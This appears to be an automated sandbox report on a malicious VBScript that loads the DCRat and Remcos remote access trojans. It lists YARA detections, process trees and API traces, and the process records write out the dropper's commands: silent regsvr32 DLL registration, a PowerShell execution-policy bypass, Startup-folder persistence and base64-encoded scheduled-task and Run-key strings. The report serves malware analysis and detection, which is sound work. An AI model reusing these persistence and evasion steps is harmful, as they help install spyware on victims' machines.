        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 0000000A.00000002.2085289507.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR  Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR  Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR  Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: RegAsm.exe PID: 3160, type: MEMORYSTR  Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: RegAsm.exe PID: 2964, type: MEMORYSTR  Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Settings.cs  Base64 encoded strings: (long base64 values omitted)
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, NormalStartup.cs  Base64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, Settings.cs  Base64 encoded strings: (long base64 values omitted)
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, NormalStartup.cs  Base64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, Settings.cs  Base64 encoded strings: (long base64 values omitted)
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, NormalStartup.cs  Base64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, Settings.cs  Base64 encoded strings: (long base64 values omitted)
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, NormalStartup.cs  Base64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 4.2.RegAsm.exe.5f20000.0.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 4.2.RegAsm.exe.5f20000.0.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, Methods.cs  Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: classification engine  Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@61/10@1/2
        Source: C:\Windows\winhlp32.exe  Code function: 17_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,  17_2_00417952
        Source: C:\Windows\winhlp32.exe  Code function: 19_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,  19_2_00417952
        Source: C:\Windows\winhlp32.exe  Code function: 21_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,  21_2_00417952
        Source: C:\Windows\winhlp32.exe  Code function: 23_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,  23_2_00417952
        Source: C:\Windows\winhlp32.exe  Code function: 27_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,  27_2_00417952
        Source: C:\Windows\winhlp32.exe  Code function: 17_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,  17_2_0040F474
        Source: C:\Windows\winhlp32.exe  Code function: 17_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,  17_2_0041B4A8
        Source: C:\Windows\winhlp32.exe  Code function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,  17_2_0041AA4A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Mutant created: NULL
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Mutant created: \Sessions\1\BaseNamedObjects\asasasa4242asas
        Source: C:\Windows\winhlp32.exe  Mutant created: \Sessions\1\BaseNamedObjects\asasasas-SEG6JT
        Source: C:\Windows\SysWOW64\wscript.exe  File created: C:\Users\user\AppData\Local\Temp\dynwrapx.dll
        Source: unknown  Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\System32\wscript.exe  File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe  Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: lmg1_Mlakaifa443456.vbs  ReversingLabs: Detection: 26%
        Source: unknown  Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit
        Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: unknown  Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit
        Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\System32\wscript.exe  Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: cryptsp.dll
